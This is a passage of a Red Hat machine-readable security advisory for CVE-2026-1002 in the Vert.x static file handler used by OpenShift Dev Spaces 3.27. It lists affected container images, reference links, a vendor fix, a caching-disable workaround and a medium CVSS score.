"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1002"
},
{
"category": "external",
"summary": "RHBZ#2430180",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430180"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1002",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1002"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1002",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1002"
},
{
"category": "external",
"summary": "https://github.com/eclipse-vertx/vert.x/pull/5895",
"url": "https://github.com/eclipse-vertx/vert.x/pull/5895"
}
],
"release_date": "2026-01-15T20:50:25.642000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, consider disabling the static handler cache by configuring the StaticHandler instance with setCachingEnabled(false), for example:\n\n~~~\nStaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);\n~~~",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
